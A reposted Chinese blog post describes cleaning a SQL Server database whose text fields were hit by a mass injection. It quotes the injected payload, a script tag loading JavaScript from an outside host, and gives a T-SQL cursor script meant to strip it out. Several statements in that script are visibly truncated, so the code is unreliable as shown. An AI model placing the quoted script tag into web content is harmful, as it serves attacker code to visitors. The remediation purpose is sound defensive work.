关于注入

< DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd>

这几天朋友的网站天天被搞破坏的人恶意注入，也许是程序没写好的原因，数据库每个字段加了一段script（<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>，而这个script地址时不时的有变化）。因为这个朋友最怕数据丢失，希望恢复数据，于是我就帮他写了一个清理字段的sql脚本。呵，以后自己也可以用到。

    declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)

    set @injectSql='<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>'

          DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'

          OPEN curLabel

          FETCH NEXT FROM curLabel INTO @name

          WHILE @@FETCH_STATUS = 0

          BEGIN

    DECLARE curLabel1 CURSOR FOR SELECT Column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE (TABLE_NAME = @name)

    OPEN curLabel1

    FETCH NEXT FROM curLabel1 INTO @columnName,@columnType

    WHILE @@FETCH_STATUS = 0

    BEGIN

     if((@columnType='text' or @columnType='ntext'))

      --print 1

      BEGIN TRY

       declare @primaryKey nvarchar(255);

       SELECT @primaryKey=primaryKey from

       (select

        c.name as primaryKey,

        case when c.colid in(select ik.colid

        from sysindexes i, Sysindexkeys ik, sysobjects oo

        where i.id=ik.id and i.indid=ik.indid

         and i.name=oo.name and oo.xtype='PK' --主键

         and o.id=i.id

        ) then 1 else 0 end isPrimaryKey

        from sysobjects o inner join syscolumns c on o.id=c.id

        where o.xtype='U'

        and ) as t where isPrimaryKey=1

       exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr( from @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex() from where @Position>0 begin;set @Position=@Position-1;updatetext @ptr @Position @len '''';select @Position=patindex() from where NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')

      END TRY

      BEGIN CATCH

       print(@name+'.'+@columnName)

      END CATCH;

     else

      if(@columnType='nvarchar' or @columnType='varchar')

      exec('update set )

    END

    CLOSE curLabel1

    DEALLOCATE curLabel1

          END

          CLOSE curLabel

          DEALLOCATE curLabel

<a href="http://www.cnblogs.com/tag/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8A%80%E6%9C%AF/feeds">#数据库技术</a>

本文转自 netcorner 博客园博客，原文链接：http://www.cnblogs.com/netcorner/archive/2008/12/06/2912095.html   ，如需转载请自行联系原作者